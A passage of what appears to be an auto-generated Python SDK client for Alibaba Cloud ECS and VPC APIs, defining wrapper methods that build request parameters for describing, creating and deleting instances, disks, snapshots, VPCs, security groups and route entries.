'RPC', 'query') api_request._params = { "VSwitchId": vswitch_id, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "VpcId": vpc_id, "OwnerAccount": owner_account, "PageSize": page_size, "ZoneId": zone_id, "IsDefault": is_default, "OwnerId": owner_id, "PageNumber": page_number} return self._handle_request(api_request).result def describe_vrouters( self, resource_owner_id=None, vrouter_id=None, resource_owner_account=None, region_id=None, owner_account=None, page_size=None, owner_id=None, page_number=None): api_request = APIRequest('DescribeVRouters', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "VRouterId": vrouter_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "PageSize": page_size, "OwnerId": owner_id, "PageNumber": page_number} return self._handle_request(api_request).result def describe_vpcs( self, resource_owner_id=None, resource_owner_account=None, region_id=None, vpc_id=None, owner_account=None, page_size=None, is_default=None, owner_id=None, 
page_number=None): api_request = APIRequest('DescribeVpcs', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "VpcId": vpc_id, "OwnerAccount": owner_account, "PageSize": page_size, "IsDefault": is_default, "OwnerId": owner_id, "PageNumber": page_number} return self._handle_request(api_request).result def describe_snapshots( self, resource_owner_id=None, filter2_value=None, snapshot_ids=None, usage=None, snapshot_link_id=None, snapshot_name=None, page_number=None, resource_group_id=None, filter1_key=None, region_id=None, page_size=None, disk_id=None, list_of_tag=None, dry_run=None, resource_owner_account=None, owner_account=None, source_disk_type=None, filter1_value=None, filter2_key=None, owner_id=None, instance_id=None, encrypted=None, snapshot_type=None, kms_key_id=None, status=None): api_request = APIRequest('DescribeSnapshots', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "Filter.2.Value": filter2_value, "SnapshotIds": snapshot_ids, "Usage": usage, "SnapshotLinkId": snapshot_link_id, "SnapshotName": snapshot_name, "PageNumber": page_number, "ResourceGroupId": resource_group_id, "Filter.1.Key": filter1_key, "RegionId": region_id, "PageSize": page_size, "DiskId": disk_id, "Tag": list_of_tag, "DryRun": dry_run, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "SourceDiskType": source_disk_type, "Filter.1.Value": filter1_value, "Filter.2.Key": filter2_key, "OwnerId": owner_id, "InstanceId": instance_id, "Encrypted": encrypted, "SnapshotType": snapshot_type, "KMSKeyId": kms_key_id, "Status": status} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_security_groups( self, resource_owner_id=None, dry_run=None, fuzzy_query=None, resource_owner_account=None, owner_account=None, security_group_id=None, is_query_ecs_count=None, network_type=None, owner_id=None, security_group_ids=None, security_group_name=None, page_number=None, resource_group_id=None, region_id=None, vpc_id=None, page_size=None, list_of_tag=None): api_request = APIRequest('DescribeSecurityGroups', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "DryRun": dry_run, "FuzzyQuery": fuzzy_query, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "SecurityGroupId": security_group_id, "IsQueryEcsCount": is_query_ecs_count, "NetworkType": network_type, "OwnerId": owner_id, "SecurityGroupIds": security_group_ids, "SecurityGroupName": security_group_name, "PageNumber": page_number, "ResourceGroupId": resource_group_id, "RegionId": region_id, "VpcId": vpc_id, "PageSize": page_size, "Tag": list_of_tag} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_security_group_attribute( self, nic_type=None, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_account=None, security_group_id=None, owner_id=None, direction=None): api_request = APIRequest('DescribeSecurityGroupAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "NicType": nic_type, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": 
resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "SecurityGroupId": security_group_id, "OwnerId": owner_id, "Direction": direction} return self._handle_request(api_request).result def describe_route_tables( self, resource_owner_id=None, vrouter_id=None, resource_owner_account=None, owner_account=None, owner_id=None, page_number=None, router_type=None, route_table_name=None, region_id=None, router_id=None, page_size=None, route_table_id=None): api_request = APIRequest('DescribeRouteTables', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "VRouterId": vrouter_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "PageNumber": page_number, "RouterType": router_type, "RouteTableName": route_table_name, "RegionId": region_id, "RouterId": router_id, "PageSize": page_size, "RouteTableId": route_table_id} return self._handle_request(api_request).result def describe_regions( self, resource_owner_id=None, resource_owner_account=None, owner_account=None, accept_language=None, owner_id=None, instance_charge_type=None, resource_type=None): api_request = APIRequest('DescribeRegions', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "AcceptLanguage": accept_language, "OwnerId": owner_id, "InstanceChargeType": instance_charge_type, "ResourceType": resource_type} return self._handle_request(api_request).result def describe_limitation( self, limitation=None, resource_owner_id=None, resource_owner_account=None, owner_account=None, owner_id=None): api_request = APIRequest('DescribeLimitation', 'GET', 'http', 'RPC', 'query') api_request._params = { "Limitation": limitation, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_instance_vnc_url( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, region_id=None, owner_account=None, owner_id=None): api_request = APIRequest('DescribeInstanceVncUrl', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_instance_vnc_passwd( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, region_id=None, owner_account=None, owner_id=None): api_request = APIRequest('DescribeInstanceVncPasswd', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_instance_types( self, resource_owner_id=None, resource_owner_account=None, owner_account=None, instance_type_family=None, owner_id=None): api_request = APIRequest('DescribeInstanceTypes', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "InstanceTypeFamily": instance_type_family, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_instance_status( self, 
resource_owner_id=None, resource_owner_account=None, region_id=None, owner_account=None, page_size=None, zone_id=None, cluster_id=None, owner_id=None, page_number=None): api_request = APIRequest('DescribeInstanceStatus', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "PageSize": page_size, "ZoneId": zone_id, "ClusterId": cluster_id, "OwnerId": owner_id, "PageNumber": page_number} return self._handle_request(api_request).result def describe_instances( self, inner_ip_addresses=None, resource_owner_id=None, image_id=None, private_ip_addresses=None, hpc_cluster_id=None, filter2_value=None, filter4_value=None, io_optimized=None, security_group_id=None, key_pair_name=None, filter4_key=None, page_number=None, resource_group_id=None, lock_reason=None, filter1_key=None, region_id=None, rdma_ip_addresses=None, device_available=None, page_size=None, public_ip_addresses=None, instance_type=None, list_of_tag=None, instance_charge_type=None, filter3_value=None, dry_run=None, resource_owner_account=None, owner_account=None, instance_type_family=None, filter1_value=None, need_sale_cycle=None, filter2_key=None, owner_id=None, vswitch_id=None, eip_addresses=None, instance_name=None, instance_ids=None, internet_charge_type=None, vpc_id=None, zone_id=None, filter3_key=None, instance_network_type=None, status=None): api_request = APIRequest('DescribeInstances', 'GET', 'http', 'RPC', 'query') api_request._params = { "InnerIpAddresses": inner_ip_addresses, "ResourceOwnerId": resource_owner_id, "ImageId": image_id, "PrivateIpAddresses": private_ip_addresses, "HpcClusterId": hpc_cluster_id, "Filter.2.Value": filter2_value, "Filter.4.Value": filter4_value, "IoOptimized": io_optimized, "SecurityGroupId": security_group_id, "KeyPairName": key_pair_name, "Filter.4.Key": filter4_key, "PageNumber": page_number, "ResourceGroupId": resource_group_id, "LockReason": lock_reason, "Filter.1.Key": filter1_key, "RegionId": region_id, "RdmaIpAddresses": rdma_ip_addresses, "DeviceAvailable": device_available, "PageSize": page_size, "PublicIpAddresses": public_ip_addresses, "InstanceType": instance_type, "Tag": list_of_tag, "InstanceChargeType": instance_charge_type, "Filter.3.Value": filter3_value, "DryRun": dry_run, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "InstanceTypeFamily": instance_type_family, "Filter.1.Value": filter1_value, "NeedSaleCycle": need_sale_cycle, "Filter.2.Key": filter2_key, "OwnerId": owner_id, "VSwitchId": vswitch_id, "EipAddresses": eip_addresses, "InstanceName": instance_name, "InstanceIds": instance_ids, "InternetChargeType": internet_charge_type, "VpcId": vpc_id, "ZoneId": zone_id, "Filter.3.Key": filter3_key, "InstanceNetworkType": instance_network_type, "Status": status} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_instance_physical_attribute( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, owner_account=None, owner_id=None): api_request = APIRequest('DescribeInstancePhysicalAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id} return 
self._handle_request(api_request).result def describe_instance_monitor_data( self, resource_owner_id=None, start_time=None, period=None, resource_owner_account=None, owner_account=None, end_time=None, owner_id=None, instance_id=None): api_request = APIRequest('DescribeInstanceMonitorData', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "StartTime": start_time, "Period": period, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "EndTime": end_time, "OwnerId": owner_id, "InstanceId": instance_id} return self._handle_request(api_request).result def describe_instance_attribute( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, owner_account=None, owner_id=None): api_request = APIRequest('DescribeInstanceAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_image_share_permission( self, resource_owner_id=None, image_id=None, resource_owner_account=None, region_id=None, owner_account=None, page_size=None, owner_id=None, page_number=None): api_request = APIRequest('DescribeImageSharePermission', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ImageId": image_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "PageSize": page_size, "OwnerId": owner_id, "PageNumber": page_number} return self._handle_request(api_request).result def describe_images( self, action_type=None, resource_owner_id=None, image_id=None, snapshot_id=None, usage=None, page_number=None, image_owner_alias=None, resource_group_id=None, is_support_io_optimized=None, region_id=None, image_name=None, is_support_cloudinit=None, page_size=None, instance_type=None, list_of_tag=None, architecture=None, dry_run=None, resource_owner_account=None, owner_account=None, show_expired=None, os_type=None, owner_id=None, list_of_filter_=None, status=None): api_request = APIRequest('DescribeImages', 'GET', 'http', 'RPC', 'query') api_request._params = { "ActionType": action_type, "ResourceOwnerId": resource_owner_id, "ImageId": image_id, "SnapshotId": snapshot_id, "Usage": usage, "PageNumber": page_number, "ImageOwnerAlias": image_owner_alias, "ResourceGroupId": resource_group_id, "IsSupportIoOptimized": is_support_io_optimized, "RegionId": region_id, "ImageName": image_name, "IsSupportCloudinit": is_support_cloudinit, "PageSize": page_size, "InstanceType": instance_type, "Tag": list_of_tag, "Architecture": architecture, "DryRun": dry_run, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "ShowExpired": show_expired, "OSType": os_type, "OwnerId": owner_id, "Filter": list_of_filter_, "Status": status} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), "Filter": ('Filter', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_eip_monitor_data( self, resource_owner_id=None, period=None, resource_owner_account=None, region_id=None, owner_account=None, end_time=None, allocation_id=None, start_time=None, owner_id=None): api_request = APIRequest('DescribeEipMonitorData', 'GET', 'http', 'RPC', 'query') 
api_request._params = { "ResourceOwnerId": resource_owner_id, "Period": period, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "EndTime": end_time, "AllocationId": allocation_id, "StartTime": start_time, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_eip_addresses( self, resource_owner_id=None, resource_owner_account=None, filter2_value=None, isp=None, owner_account=None, allocation_id=None, filter1_value=None, filter2_key=None, owner_id=None, eip_address=None, page_number=None, lock_reason=None, filter1_key=None, region_id=None, associated_instance_type=None, page_size=None, charge_type=None, associated_instance_id=None, status=None): api_request = APIRequest('DescribeEipAddresses', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "Filter.2.Value": filter2_value, "ISP": isp, "OwnerAccount": owner_account, "AllocationId": allocation_id, "Filter.1.Value": filter1_value, "Filter.2.Key": filter2_key, "OwnerId": owner_id, "EipAddress": eip_address, "PageNumber": page_number, "LockReason": lock_reason, "Filter.1.Key": filter1_key, "RegionId": region_id, "AssociatedInstanceType": associated_instance_type, "PageSize": page_size, "ChargeType": charge_type, "AssociatedInstanceId": associated_instance_id, "Status": status} return self._handle_request(api_request).result def describe_disks( self, resource_owner_id=None, snapshot_id=None, filter2_value=None, auto_snapshot_policy_id=None, page_number=None, disk_name=None, delete_auto_snapshot=None, resource_group_id=None, disk_charge_type=None, lock_reason=None, filter1_key=None, region_id=None, page_size=None, disk_ids=None, list_of_tag=None, delete_with_instance=None, enable_auto_snapshot=None, dry_run=None, resource_owner_account=None, owner_account=None, filter1_value=None, portable=None, enable_automated_snapshot_policy=None, filter2_key=None, owner_id=None, disk_type=None, list_of_additional_attributes=None, enable_shared=None, instance_id=None, encrypted=None, zone_id=None, category=None, kms_key_id=None, status=None): api_request = APIRequest('DescribeDisks', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "SnapshotId": snapshot_id, "Filter.2.Value": filter2_value, "AutoSnapshotPolicyId": auto_snapshot_policy_id, "PageNumber": page_number, "DiskName": disk_name, "DeleteAutoSnapshot": delete_auto_snapshot, "ResourceGroupId": resource_group_id, "DiskChargeType": disk_charge_type, "LockReason": lock_reason, "Filter.1.Key": filter1_key, "RegionId": region_id, "PageSize": page_size, "DiskIds": disk_ids, "Tag": list_of_tag, "DeleteWithInstance": delete_with_instance, "EnableAutoSnapshot": enable_auto_snapshot, "DryRun": dry_run, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "Filter.1.Value": filter1_value, "Portable": portable, "EnableAutomatedSnapshotPolicy": enable_automated_snapshot_policy, "Filter.2.Key": filter2_key, "OwnerId": owner_id, "DiskType": disk_type, "AdditionalAttributes": list_of_additional_attributes, "EnableShared": enable_shared, "InstanceId": instance_id, "Encrypted": encrypted, "ZoneId": zone_id, "Category": category, "KMSKeyId": kms_key_id, "Status": status} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), "AdditionalAttributes": ('AdditionalAttributes', 'list', 'str', None), } verify_params(api_request._params, 
repeat_info) return self._handle_request(api_request).result def describe_disk_monitor_data( self, resource_owner_id=None, start_time=None, disk_id=None, period=None, resource_owner_account=None, owner_account=None, end_time=None, owner_id=None): api_request = APIRequest('DescribeDiskMonitorData', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "StartTime": start_time, "DiskId": disk_id, "Period": period, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "EndTime": end_time, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_clusters( self, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_account=None, owner_id=None): api_request = APIRequest('DescribeClusters', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def delete_vswitch( self, vswitch_id=None, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_account=None, owner_id=None): api_request = APIRequest('DeleteVSwitch', 'GET', 'http', 'RPC', 'query') api_request._params = { "VSwitchId": vswitch_id, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def delete_vpc( self, resource_owner_id=None, resource_owner_account=None, region_id=None, vpc_id=None, owner_account=None, owner_id=None): api_request = APIRequest('DeleteVpc', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "VpcId": vpc_id, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def delete_snapshot( self, resource_owner_id=None, snapshot_id=None, resource_owner_account=None, owner_account=None, force=None, owner_id=None): api_request = APIRequest('DeleteSnapshot', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "SnapshotId": snapshot_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "Force": force, "OwnerId": owner_id} return self._handle_request(api_request).result def delete_security_group( self, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_account=None, security_group_id=None, owner_id=None): api_request = APIRequest('DeleteSecurityGroup', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "SecurityGroupId": security_group_id, "OwnerId": owner_id} return self._handle_request(api_request).result def delete_route_entry( self, resource_owner_id=None, resource_owner_account=None, region_id=None, destination_cidr_block=None, owner_account=None, next_hop_id=None, owner_id=None, list_of_next_hop_list=None, route_table_id=None): api_request = APIRequest('DeleteRouteEntry', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "DestinationCidrBlock": destination_cidr_block, "OwnerAccount": owner_account, "NextHopId": next_hop_id, "OwnerId": owner_id, 
"NextHopList": list_of_next_hop_list, "RouteTableId": route_table_id} repeat_info = { "NextHopList": ( 'NextHopList', 'list', 'dict', [ ('NextHopId', 'str', None, None), ('NextHopType', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def delete_instance( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, owner_account=None, terminate_subscription=None, force=None, owner_id=None): api_request = APIRequest('DeleteInstance', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "TerminateSubscription": terminate_subscription, "Force": force, "OwnerId": owner_id} return self._handle_request(api_request).result def delete_image( self, resource_owner_id=None, image_id=None, resource_owner_account=None, region_id=None, owner_account=None, force=None, owner_id=None): api_request = APIRequest('DeleteImage', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ImageId": image_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "Force": force, "OwnerId": owner_id} return self._handle_request(api_request).result def delete_disk( self, resource_owner_id=None, resource_owner_account=None, owner_account=None, disk_id=None, owner_id=None): api_request = APIRequest('DeleteDisk', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "DiskId": disk_id, "OwnerId": owner_id} return self._handle_request(api_request).result def create_vswitch( self, resource_owner_id=None, resource_owner_account=None, region_id=None, client_token=None, vpc_id=None, vswitch_name=None, owner_account=None, cidr_block=None, zone_id=None, description=None, owner_id=None): api_request = APIRequest('CreateVSwitch', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "ClientToken": client_token, "VpcId": vpc_id, "VSwitchName": vswitch_name, "OwnerAccount": owner_account, "CidrBlock": cidr_block, "ZoneId": zone_id, "Description": description, "OwnerId": owner_id} return self._handle_request(api_request).result def create_vpc( self, vpc_name=None, resource_owner_id=None, resource_owner_account=None, region_id=None, client_token=None, owner_account=None, cidr_block=None, description=None, user_cidr=None, owner_id=None): api_request = APIRequest('CreateVpc', 'GET', 'http', 'RPC', 'query') api_request._params = { "VpcName": vpc_name, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "ClientToken": client_token, "OwnerAccount": owner_account, "CidrBlock": cidr_block, "Description": description, "UserCidr": user_cidr, "OwnerId": owner_id} return self._handle_request(api_request).result def create_snapshot( self, resource_owner_id=None, resource_owner_account=None, client_token=None, owner_account=None, description=None, disk_id=None, snapshot_name=None, retention_days=None, list_of_tag=None, owner_id=None): api_request = APIRequest('CreateSnapshot', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, 
"OwnerAccount": owner_account, "Description": description, "DiskId": disk_id, "SnapshotName": snapshot_name, "RetentionDays": retention_days, "Tag": list_of_tag, "OwnerId": owner_id} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def create_security_group( self, resource_owner_id=None, resource_owner_account=None, client_token=None, owner_account=None, description=None, owner_id=None, security_group_name=None, security_group_type=None, resource_group_id=None, region_id=None, vpc_id=None, list_of_tag=None): api_request = APIRequest('CreateSecurityGroup', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "Description": description, "OwnerId": owner_id, "SecurityGroupName": security_group_name, "SecurityGroupType": security_group_type, "ResourceGroupId": resource_group_id, "RegionId": region_id, "VpcId": vpc_id, "Tag": list_of_tag} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def create_route_entry( self, resource_owner_id=None, resource_owner_account=None, region_id=None, client_token=None, destination_cidr_block=None, owner_account=None, next_hop_id=None, owner_id=None, next_hop_type=None, list_of_next_hop_list=None, route_table_id=None): api_request = APIRequest('CreateRouteEntry', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "ClientToken": client_token, "DestinationCidrBlock": destination_cidr_block, "OwnerAccount": owner_account, "NextHopId": next_hop_id, "OwnerId": owner_id, "NextHopType": next_hop_type, "NextHopList": list_of_next_hop_list, "RouteTableId": route_table_id} repeat_info = { "NextHopList": ( 'NextHopList', 'list', 'dict', [ ('NextHopId', 'str', None, None), ('NextHopType', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def create_instance( self, resource_owner_id=None, hpc_cluster_id=None, security_enhancement_strategy=None, key_pair_name=None, spot_price_limit=None, deletion_protection=None, resource_group_id=None, host_name=None, password=, storage_set_partition_number=None, list_of_tag=None, auto_renew_period=None, node_controller_id=None, period=None, dry_run=None, owner_id=None, capacity_reservation_preference=None, vswitch_id=None, private_ip_address=None, spot_strategy=None, period_unit=None, instance_name=None, auto_renew=None, internet_charge_type=None, zone_id=None, internet_max_bandwidth_in=None, use_additional_service=None, affinity=None, image_id=None, client_token=, vlan_id=None, spot_interruption_behavior=None, io_optimized=None, security_group_id=None, internet_max_bandwidth_out=None, description=None, system_disk_category=None, capacity_reservation_id=None, system_disk_performance_level=None, user_data=None, password_inherit=None, region_id=None, instance_type=None, list_of_arn=None, instance_charge_type=None, deployment_set_id=None, inner_ip_address=None, resource_owner_account=None, owner_account=None, tenancy=None, system_disk_disk_name=None, ram_role_name=None, dedicated_host_id=None, 
cluster_id=None, credit_specification=None, list_of_data_disk=None, storage_set_id=None, system_disk_size=None, system_disk_description=None): api_request = APIRequest('CreateInstance', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "HpcClusterId": hpc_cluster_id, "SecurityEnhancementStrategy": security_enhancement_strategy, "KeyPairName": key_pair_name, "SpotPriceLimit": spot_price_limit, "DeletionProtection": deletion_protection, "ResourceGroupId": resource_group_id, "HostName": host_name, "Password": password, "StorageSetPartitionNumber": storage_set_partition_number, "Tag": list_of_tag, "AutoRenewPeriod": auto_renew_period, "NodeControllerId": node_controller_id, "Period": period, "DryRun": dry_run, "OwnerId": owner_id, "CapacityReservationPreference": capacity_reservation_preference, "VSwitchId": vswitch_id, "PrivateIpAddress": private_ip_address, "SpotStrategy": spot_strategy, "PeriodUnit": period_unit, "InstanceName": instance_name, "AutoRenew": auto_renew, "InternetChargeType": internet_charge_type, "ZoneId": zone_id, "InternetMaxBandwidthIn": internet_max_bandwidth_in, "UseAdditionalService": use_additional_service, "Affinity": affinity, "ImageId": image_id, "ClientToken": client_token, "VlanId": vlan_id, "SpotInterruptionBehavior": spot_interruption_behavior, "IoOptimized": io_optimized, "SecurityGroupId": security_group_id, "InternetMaxBandwidthOut": internet_max_bandwidth_out, "Description": description, "SystemDisk.Category": system_disk_category, "CapacityReservationId": capacity_reservation_id, "SystemDisk.PerformanceLevel": system_disk_performance_level, "UserData": user_data, "PasswordInherit": password_inherit, "RegionId": region_id, "InstanceType": instance_type, "Arn": list_of_arn, "InstanceChargeType": instance_charge_type, "DeploymentSetId": deployment_set_id, "InnerIpAddress": inner_ip_address, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "Tenancy": tenancy, "SystemDisk.DiskName": system_disk_disk_name, "RamRoleName": ram_role_name, "DedicatedHostId": dedicated_host_id, "ClusterId": cluster_id, "CreditSpecification": credit_specification, "DataDisk": list_of_data_disk, "StorageSetId": storage_set_id, "SystemDisk.Size": system_disk_size, "SystemDisk.Description": system_disk_description} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), "Arn": ('Arn', 'list', 'dict', [('Rolearn', 'str', None, None), ('RoleType', 'str', None, None), ('AssumeRoleFor', 'str', None, None), ]), "DataDisk": ('DataDisk', 'list', 'dict', [('DiskName', 'str', None, None), ('SnapshotId', 'str', None, None), ('Size', 'str', None, None), ('Encrypted', 'str', None, None), ('PerformanceLevel', 'str', None, None), ('Description', 'str', None, None), ('Category', 'str', None, None), ('KMSKeyId', 'str', None, None), ('Device', 'str', None, None), ('DeleteWithInstance', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def create_image( self, list_of_disk_device_mapping=None, resource_owner_id=None, snapshot_id=None, resource_owner_account=None, client_token=None, owner_account=None, description=None, owner_id=None, platform=None, resource_group_id=None, instance_id=None, region_id=None, image_name=None, image_version=None, list_of_tag=None, architecture=None): api_request = APIRequest('CreateImage', 'GET', 'http', 'RPC', 'query') api_request._params = { "DiskDeviceMapping": 
list_of_disk_device_mapping, "ResourceOwnerId": resource_owner_id, "SnapshotId": snapshot_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "Description": description, "OwnerId": owner_id, "Platform": platform, "ResourceGroupId": resource_group_id, "InstanceId": instance_id, "RegionId": region_id, "ImageName": image_name, "ImageVersion": image_version, "Tag": list_of_tag, "Architecture": architecture} repeat_info = {"DiskDeviceMapping": ('DiskDeviceMapping', 'list', 'dict', [('SnapshotId', 'str', None, None), ('Size', 'str', None, None), ('DiskType', 'str', None, None), ('Device', 'str', None, None), ]), "Tag": ('Tag', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def create_disk( self, resource_owner_id=None, snapshot_id=None, resource_owner_account=None, client_token=None, performance_level=None, owner_account=None, description=None, owner_id=None, disk_name=None, resource_group_id=None, instance_id=None, storage_set_id=None, size=None, encrypted=None, region_id=None, disk_category=None, zone_id=None, storage_set_partition_number=None, list_of_tag=None, list_of_arn=None, kms_key_id=None, advanced_features=None): api_request = APIRequest('CreateDisk', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "SnapshotId": snapshot_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "PerformanceLevel": performance_level, "OwnerAccount": owner_account, "Description": description, "OwnerId": owner_id, "DiskName": disk_name, "ResourceGroupId": resource_group_id, "InstanceId": instance_id, "StorageSetId": 